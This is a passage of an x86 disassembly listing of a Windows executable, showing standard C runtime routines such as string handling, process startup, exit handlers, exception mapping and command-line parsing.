jz short loc_4027F7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4027F3
inc edx
jmp short loc_4027D3
; ---------------------------------------------------------------------------
loc_4027F3: ; CODE XREF: sub_402770+7E�j
and byte ptr [edx], 0
inc edx
loc_4027F7: ; CODE XREF: sub_402770+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_4070CC, edx
and eax, ebx
pop ebx
leave
retn
sub_402770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_401B59+E9�p
; sub_401B59+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402881
sub_402810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_401F4B+15D�p
; sub_401F4B+16C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40283C
loc_40282D: ; CODE XREF: sub_402820+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40286F
test ecx, 3
jnz short loc_40282D
loc_40283C: ; CODE XREF: sub_402820+B�j
; sub_402820+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40283C
mov eax, [ecx-4]
test al, al
jz short loc_40287E
test ah, ah
jz short loc_402879
test eax, 0FF0000h
jz short loc_402874
test eax, 0FF000000h
jz short loc_40286F
jmp short loc_40283C
; ---------------------------------------------------------------------------
loc_40286F: ; CODE XREF: sub_402820+12�j
; sub_402820+4B�j
lea edi, [ecx-1]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_402874: ; CODE XREF: sub_402820+44�j
lea edi, [ecx-2]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_402879: ; CODE XREF: sub_402820+3D�j
lea edi, [ecx-3]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_40287E: ; CODE XREF: sub_402820+39�j
lea edi, [ecx-4]
loc_402881: ; CODE XREF: sub_402810+5�j
; sub_402820+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4028A6
loc_40288D: ; CODE XREF: sub_402820+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4028F8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40288D
jmp short loc_4028A6
; ---------------------------------------------------------------------------
loc_4028A1: ; CODE XREF: sub_402820+9E�j
; sub_402820+B8�j
mov [edi], edx
add edi, 4
loc_4028A6: ; CODE XREF: sub_402820+6B�j
; sub_402820+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4028A1
test dl, dl
jz short loc_4028F8
test dh, dh
jz short loc_4028EF
test edx, 0FF0000h
jz short loc_4028E2
test edx, 0FF000000h
jz short loc_4028DA
jmp short loc_4028A1
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402820+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028E2: ; CODE XREF: sub_402820+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028EF: ; CODE XREF: sub_402820+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028F8: ; CODE XREF: sub_402820+72�j
; sub_402820+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402820 endp
; =============== S U B R O U T I N E =======================================
sub_402900 proc near ; CODE XREF: sub_401E8B+19�p
arg_0 = dword ptr 4
cmp dword_406E7C, 1
jle short loc_40291A
push 107h
push [esp+4+arg_0]
call sub_402B3C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40291A: ; CODE XREF: sub_402900+7�j
mov eax, [esp+arg_0]
mov ecx, off_406C70
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402900 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405150
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_4050D4 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_4070F4, edx
mov ecx, eax
and ecx, 0FFh
mov dword_4070F0, ecx
shl ecx, 8
add ecx, edx
mov dword_4070EC, ecx
shr eax, 10h
mov dword_4070E8, eax
xor esi, esi
push esi
call sub_403472
pop ecx
test eax, eax
jnz short loc_40299A
push 1Ch
call sub_402A49
pop ecx
loc_40299A: ; CODE XREF: .text:00402990�j
mov [ebp-4], esi
call sub_4032C7
call dword_4050D0 ; GetCommandLineA
mov dword_4075F8, eax
call sub_403195
mov dword_4070D0, eax
call sub_402F48
call sub_402E8F
call sub_402BB1
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_4050CC ; GetStartupInfoA
call sub_402E37
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_4029E7
movzx eax, word ptr [ebp-2Ch]
jmp short loc_4029EA
; ---------------------------------------------------------------------------
loc_4029E7: ; CODE XREF: .text:004029DF�j
push 0Ah
pop eax
loc_4029EA: ; CODE XREF: .text:004029E5�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_4050C8 ; GetModuleHandleA
push eax
call sub_4020D9
mov [ebp-60h], eax
push eax
call sub_402BDE
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_402CB3
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402BEF
; =============== S U B R O U T I N E =======================================
sub_402A24 proc near ; CODE XREF: sub_402E8F+4E�p
; sub_402E8F+7D�p ...
arg_0 = dword ptr 4
cmp dword_4070D8, 1
jnz short loc_402A32
call sub_403680
loc_402A32: ; CODE XREF: sub_402A24+7�j
push [esp+arg_0]
call sub_4036B9
push 0FFh
call off_406C60
pop ecx
pop ecx
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
sub_402A49 proc near ; CODE XREF: .text:00402994�p
arg_0 = dword ptr 4
cmp dword_4070D8, 1
jnz short loc_402A57
call sub_403680
loc_402A57: ; CODE XREF: sub_402A49+7�j
push [esp+arg_0]
call sub_4036B9
pop ecx
push 0FFh
call dword_4050D8 ; ExitProcess
retn
sub_402A49 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402A86
loc_402A70: ; CODE XREF: sub_402A86+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402A86
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402A86 proc near ; CODE XREF: sub_4026F0+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402A70 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_402AAB
loc_402A98: ; CODE XREF: sub_402A86+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402A70
test cl, cl
jz short loc_402AF4
test edx, 3
jnz short loc_402A98
loc_402AAB: ; CODE XREF: sub_402A86+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_402AB6: ; CODE XREF: sub_402A86+5B�j
; sub_402A86+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402AF8
and eax, 81010100h
jz short loc_402AB6
and eax, 1010100h
jnz short loc_402AF2
and esi, 80000000h
jnz short loc_402AB6
loc_402AF2: ; CODE XREF: sub_402A86+62�j
; sub_402A86+7B�j ...
pop esi
pop edi
loc_402AF4: ; CODE XREF: sub_402A86+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402AF8: ; CODE XREF: sub_402A86+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402B35
test al, al
jz short loc_402AF2
cmp ah, bl
jz short loc_402B2E
test ah, ah
jz short loc_402AF2
shr eax, 10h
cmp al, bl
jz short loc_402B27
test al, al
jz short loc_402AF2
cmp ah, bl
jz short loc_402B20
test ah, ah
jz short loc_402AF2
jmp short loc_402AB6
; ---------------------------------------------------------------------------
loc_402B20: ; CODE XREF: sub_402A86+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B27: ; CODE XREF: sub_402A86+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B2E: ; CODE XREF: sub_402A86+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B35: ; CODE XREF: sub_402A86+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B3C proc near ; CODE XREF: sub_402900+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402B5A
mov ecx, off_406C70
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402BAC
; ---------------------------------------------------------------------------
loc_402B5A: ; CODE XREF: sub_402B3C+10�j
mov ecx, eax
push esi
mov esi, off_406C70
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402B7F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402B88
; ---------------------------------------------------------------------------
loc_402B7F: ; CODE XREF: sub_402B3C+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402B88: ; CODE XREF: sub_402B3C+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_40380C
add esp, 1Ch
test eax, eax
jnz short loc_402BA8
leave
retn
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402B3C+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402BAC: ; CODE XREF: sub_402B3C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402B3C endp
; =============== S U B R O U T I N E =======================================
sub_402BB1 proc near ; CODE XREF: .text:004029C1�p
mov eax, dword_4075F4
test eax, eax
jz short loc_402BBC
call eax ; dword_4075F4
loc_402BBC: ; CODE XREF: sub_402BB1+7�j
push offset dword_406010
push offset dword_406008
call sub_402C99
push offset dword_406004
push offset dword_406000
call sub_402C99
add esp, 10h
retn
sub_402BB1 endp
; =============== S U B R O U T I N E =======================================
sub_402BDE proc near ; CODE XREF: .text:00402A00�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402C00
add esp, 0Ch
retn
sub_402BDE endp
; =============== S U B R O U T I N E =======================================
sub_402BEF proc near ; CODE XREF: .text:00402A1F�p
; sub_402A24+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402C00
add esp, 0Ch
retn
sub_402BEF endp
; =============== S U B R O U T I N E =======================================
sub_402C00 proc near ; CODE XREF: sub_402BDE+8�p
; sub_402BEF+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_407124, edi
jnz short loc_402C1D
push [esp+4+arg_0]
call dword_4050E0 ; GetCurrentProcess
push eax
call dword_4050DC ; TerminateProcess
loc_402C1D: ; CODE XREF: sub_402C00+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_407120, edi
mov byte_40711C, bl
jnz short loc_402C71
mov eax, dword_4075F0
test eax, eax
jz short loc_402C60
mov ecx, dword_4075EC
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402C5F
loc_402C4C: ; CODE XREF: sub_402C00+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402C54
call eax
loc_402C54: ; CODE XREF: sub_402C00+50�j
sub esi, 4
cmp esi, dword_4075F0
jnb short loc_402C4C
loc_402C5F: ; CODE XREF: sub_402C00+4A�j
pop esi
loc_402C60: ; CODE XREF: sub_402C00+3C�j
push offset dword_406018
push offset dword_406014
call sub_402C99
pop ecx
pop ecx
loc_402C71: ; CODE XREF: sub_402C00+33�j
push offset dword_406020
push offset dword_40601C
call sub_402C99
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402C97
push [esp+4+arg_0]
mov dword_407124, edi
call dword_4050D8 ; ExitProcess
loc_402C97: ; CODE XREF: sub_402C00+85�j
pop edi
retn
sub_402C00 endp
; =============== S U B R O U T I N E =======================================
sub_402C99 proc near ; CODE XREF: sub_402BB1+15�p
; sub_402BB1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402C9E: ; CODE XREF: sub_402C99+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402CB1
mov eax, [esi]
test eax, eax
jz short loc_402CAC
call eax
loc_402CAC: ; CODE XREF: sub_402C99+F�j
add esi, 4
jmp short loc_402C9E
; ---------------------------------------------------------------------------
loc_402CB1: ; CODE XREF: sub_402C99+9�j
pop esi
retn
sub_402C99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CB3 proc near ; CODE XREF: .text:00402A11�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402DF4
test eax, eax
pop ecx
jz loc_402DE8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402DE8
cmp ebx, 5
jnz short loc_402CE4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402DF1
; ---------------------------------------------------------------------------
loc_402CE4: ; CODE XREF: sub_402CB3+23�j
cmp ebx, 1
jz loc_402DE3
mov ecx, dword_407128
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_407128, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402DD3
mov ecx, dword_406F00
mov edx, dword_406F04
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402D33
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406E90h[esi*4]
loc_402D2A: ; CODE XREF: sub_402CB3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402D2A
loc_402D33: ; CODE XREF: sub_402CB3+69�j
mov eax, [eax]
mov esi, dword_406F0C
cmp eax, 0C000008Eh
jnz short loc_402D4E
mov dword_406F0C, 83h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D4E: ; CODE XREF: sub_402CB3+8D�j
cmp eax, 0C0000090h
jnz short loc_402D61
mov dword_406F0C, 81h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D61: ; CODE XREF: sub_402CB3+A0�j
cmp eax, 0C0000091h
jnz short loc_402D74
mov dword_406F0C, 84h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D74: ; CODE XREF: sub_402CB3+B3�j
cmp eax, 0C0000093h
jnz short loc_402D87
mov dword_406F0C, 85h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402CB3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402D9A
mov dword_406F0C, 82h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D9A: ; CODE XREF: sub_402CB3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402DAD
mov dword_406F0C, 86h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402DAD: ; CODE XREF: sub_402CB3+EC�j
cmp eax, 0C0000092h
jnz short loc_402DBE
mov dword_406F0C, 8Ah
loc_402DBE: ; CODE XREF: sub_402CB3+99�j
; sub_402CB3+AC�j ...
push dword_406F0C
push 8
call ebx ; _lread
pop ecx
mov dword_406F0C, esi
pop ecx
pop esi
jmp short loc_402DDB
; ---------------------------------------------------------------------------
loc_402DD3: ; CODE XREF: sub_402CB3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; _lread
pop ecx
loc_402DDB: ; CODE XREF: sub_402CB3+11E�j
mov eax, [ebp+arg_0]
mov dword_407128, eax
loc_402DE3: ; CODE XREF: sub_402CB3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402DF1
; ---------------------------------------------------------------------------
loc_402DE8: ; CODE XREF: sub_402CB3+F�j
; sub_402CB3+1A�j
push [ebp+arg_4]
call dword_4050E4 ; UnhandledExceptionFilter
loc_402DF1: ; CODE XREF: sub_402CB3+2C�j
; sub_402CB3+133�j
pop ebx
pop ebp
retn
sub_402CB3 endp
; =============== S U B R O U T I N E =======================================
sub_402DF4 proc near ; CODE XREF: sub_402CB3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_406F08
cmp dword_406E88, edx
push esi
mov eax, offset dword_406E88
jz short loc_402E21
lea esi, [ecx+ecx*2]
lea esi, ds:406E88h[esi*4]
loc_402E16: ; CODE XREF: sub_402DF4+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402E21
cmp [eax], edx
jnz short loc_402E16
loc_402E21: ; CODE XREF: sub_402DF4+16�j
; sub_402DF4+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406E88h[ecx*4]
cmp eax, ecx
jnb short loc_402E34
cmp [eax], edx
jz short locret_402E36
loc_402E34: ; CODE XREF: sub_402DF4+3A�j
xor eax, eax
locret_402E36: ; CODE XREF: sub_402DF4+3E�j
retn
sub_402DF4 endp
; =============== S U B R O U T I N E =======================================
sub_402E37 proc near ; CODE XREF: .text:004029D3�p
cmp dword_4075E8, 0
jnz short loc_402E45
call sub_403D5B
loc_402E45: ; CODE XREF: sub_402E37+7�j
push esi
mov esi, dword_4075F8
mov al, [esi]
cmp al, 22h
jnz short loc_402E77
loc_402E52: ; CODE XREF: sub_402E37+33�j
; sub_402E37+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402E6F
test al, al
jz short loc_402E6F
movzx eax, al
push eax
call sub_403955
test eax, eax
pop ecx
jz short loc_402E52
inc esi
jmp short loc_402E52
; ---------------------------------------------------------------------------
loc_402E6F: ; CODE XREF: sub_402E37+21�j
; sub_402E37+25�j
cmp byte ptr [esi], 22h
jnz short loc_402E81
loc_402E74: ; CODE XREF: sub_402E37+52�j
inc esi
jmp short loc_402E81
; ---------------------------------------------------------------------------
loc_402E77: ; CODE XREF: sub_402E37+19�j
cmp al, 20h
jbe short loc_402E81
loc_402E7B: ; CODE XREF: sub_402E37+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402E7B
loc_402E81: ; CODE XREF: sub_402E37+3B�j
; sub_402E37+3E�j ...
mov al, [esi]
test al, al
jz short loc_402E8B
cmp al, 20h
jbe short loc_402E74
loc_402E8B: ; CODE XREF: sub_402E37+4E�j
mov eax, esi
pop esi
retn
sub_402E37 endp
; =============== S U B R O U T I N E =======================================
sub_402E8F proc near ; CODE XREF: .text:004029BC�p
push ebx
xor ebx, ebx
cmp dword_4075E8, ebx
push esi
push edi
jnz short loc_402EA1
call sub_403D5B
loc_402EA1: ; CODE XREF: sub_402E8F+B�j
mov esi, dword_4070D0
xor edi, edi
loc_402EA9: ; CODE XREF: sub_402E8F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402EC1
cmp al, 3Dh
jz short loc_402EB4
inc edi
loc_402EB4: ; CODE XREF: sub_402E8F+22�j
push esi
call sub_402300
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402EA9
; ---------------------------------------------------------------------------
loc_402EC1: ; CODE XREF: sub_402E8F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403DA6
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_407104, esi
jnz short loc_402EE3
push 9
call sub_402A24
pop ecx
loc_402EE3: ; CODE XREF: sub_402E8F+4A�j
mov edi, dword_4070D0
cmp [edi], bl
jz short loc_402F26
push ebp
loc_402EEE: ; CODE XREF: sub_402E8F+94�j
push edi
call sub_402300
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402F1F
push ebp
call sub_403DA6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402F12
push 9
call sub_402A24
pop ecx
loc_402F12: ; CODE XREF: sub_402E8F+79�j
push edi
push dword ptr [esi]
call sub_402810
pop ecx
add esi, 4
pop ecx
loc_402F1F: ; CODE XREF: sub_402E8F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402EEE
pop ebp
loc_402F26: ; CODE XREF: sub_402E8F+5C�j
push dword_4070D0
call sub_403D77
pop ecx
mov dword_4070D0, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_4075E4, 1
pop ebx
retn
sub_402E8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F48 proc near ; CODE XREF: .text:004029B7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_4075E8, ebx
push esi
push edi
jnz short loc_402F5F
call sub_403D5B
loc_402F5F: ; CODE XREF: sub_402F48+10�j
mov esi, offset dword_40712C
push 104h
push esi
push ebx
call dword_405038 ; GetModuleFileNameA
mov eax, dword_4075F8
mov dword_407114, esi
mov edi, esi
cmp [eax], bl
jz short loc_402F84
mov edi, eax
loc_402F84: ; CODE XREF: sub_402F48+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402FE1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403DA6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402FB4
push 8
call sub_402A24
pop ecx
loc_402FB4: ; CODE XREF: sub_402F48+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402FE1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_4070FC, esi
pop edi
pop esi
mov dword_4070F8, eax
pop ebx
leave
retn
sub_402F48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FE1 proc near ; CODE XREF: sub_402F48+47�p
; sub_402F48+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_40300B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_40300B: ; CODE XREF: sub_402FE1+20�j
cmp byte ptr [eax], 22h
jnz short loc_403054
loc_403010: ; CODE XREF: sub_402FE1+58�j
; sub_402FE1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_403042
test dl, dl
jz short loc_403042
movzx edx, dl
test byte_4073C1[edx], 4
jz short loc_403035
inc dword ptr [ecx]
test esi, esi
jz short loc_403035
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_403035: ; CODE XREF: sub_402FE1+46�j
; sub_402FE1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_403010
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_403042: ; CODE XREF: sub_402FE1+36�j
; sub_402FE1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40304C
and byte ptr [esi], 0
inc esi
loc_40304C: ; CODE XREF: sub_402FE1+65�j
cmp byte ptr [eax], 22h
jnz short loc_403097
inc eax
jmp short loc_403097
; ---------------------------------------------------------------------------
loc_403054: ; CODE XREF: sub_402FE1+2D�j
; sub_402FE1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40305F
mov dl, [eax]
mov [esi], dl
inc esi
loc_40305F: ; CODE XREF: sub_402FE1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_4073C1[ebx], 4
jz short loc_40307A
inc dword ptr [ecx]
test esi, esi
jz short loc_403079
mov bl, [eax]
mov [esi], bl
inc esi
loc_403079: ; CODE XREF: sub_402FE1+91�j
inc eax
loc_40307A: ; CODE XREF: sub_402FE1+8B�j
cmp dl, 20h
jz short loc_403088
test dl, dl
jz short loc_40308C
cmp dl, 9
jnz short loc_403054
loc_403088: ; CODE XREF: sub_402FE1+9C�j
test dl, dl
jnz short loc_40308F
loc_40308C: ; CODE XREF: sub_402FE1+A0�j
dec eax
jmp short loc_403097
; ---------------------------------------------------------------------------
loc_40308F: ; CODE XREF: sub_402FE1+A9�j
test esi, esi
jz short loc_403097
and byte ptr [esi-1], 0
loc_403097: ; CODE XREF: sub_402FE1+6E�j
; sub_402FE1+71�j ...
and [ebp+arg_10], 0
loc_40309B: ; CODE XREF: sub_402FE1+19E�j
cmp byte ptr [eax], 0
jz loc_403184
loc_4030A4: ; CODE XREF: sub_402FE1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_4030B0
cmp dl, 9
jnz short loc_4030B3
loc_4030B0: ; CODE XREF: sub_402FE1+C8�j
inc eax
jmp short loc_4030A4
; ---------------------------------------------------------------------------
loc_4030B3: ; CODE XREF: sub_402FE1+CD�j
cmp byte ptr [eax], 0
jz loc_403184
test edi, edi
jz short loc_4030C8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_4030C8: ; CODE XREF: sub_402FE1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_4030CD: ; CODE XREF: sub_402FE1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_4030D6: ; CODE XREF: sub_402FE1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_4030DF
inc eax
inc ebx
jmp short loc_4030D6
; ---------------------------------------------------------------------------
loc_4030DF: ; CODE XREF: sub_402FE1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403110
test bl, 1
jnz short loc_40310E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_4030FD
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_4030FD
mov eax, edx
jmp short loc_403100
; ---------------------------------------------------------------------------
loc_4030FD: ; CODE XREF: sub_402FE1+10D�j
; sub_402FE1+116�j
mov [ebp+arg_0], edi
loc_403100: ; CODE XREF: sub_402FE1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40310E: ; CODE XREF: sub_402FE1+106�j
shr ebx, 1
loc_403110: ; CODE XREF: sub_402FE1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403125
inc ebx
loc_403118: ; CODE XREF: sub_402FE1+142�j
test esi, esi
jz short loc_403120
mov byte ptr [esi], 5Ch
inc esi
loc_403120: ; CODE XREF: sub_402FE1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403118
loc_403125: ; CODE XREF: sub_402FE1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403175
cmp [ebp+arg_10], 0
jnz short loc_40313B
cmp dl, 20h
jz short loc_403175
cmp dl, 9
jz short loc_403175
loc_40313B: ; CODE XREF: sub_402FE1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40316F
test esi, esi
jz short loc_40315E
movzx ebx, dl
test byte_4073C1[ebx], 4
jz short loc_403157
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403157: ; CODE XREF: sub_402FE1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40316D
; ---------------------------------------------------------------------------
loc_40315E: ; CODE XREF: sub_402FE1+162�j
movzx edx, dl
test byte_4073C1[edx], 4
jz short loc_40316D
inc eax
inc dword ptr [ecx]
loc_40316D: ; CODE XREF: sub_402FE1+17B�j
; sub_402FE1+187�j
inc dword ptr [ecx]
loc_40316F: ; CODE XREF: sub_402FE1+15E�j
inc eax
jmp loc_4030CD
; ---------------------------------------------------------------------------
loc_403175: ; CODE XREF: sub_402FE1+148�j
; sub_402FE1+153�j ...
test esi, esi
jz short loc_40317D
and byte ptr [esi], 0
inc esi
loc_40317D: ; CODE XREF: sub_402FE1+196�j
inc dword ptr [ecx]
jmp loc_40309B
; ---------------------------------------------------------------------------
loc_403184: ; CODE XREF: sub_402FE1+BD�j
; sub_402FE1+D5�j
test edi, edi
jz short loc_40318B
and dword ptr [edi], 0
loc_40318B: ; CODE XREF: sub_402FE1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
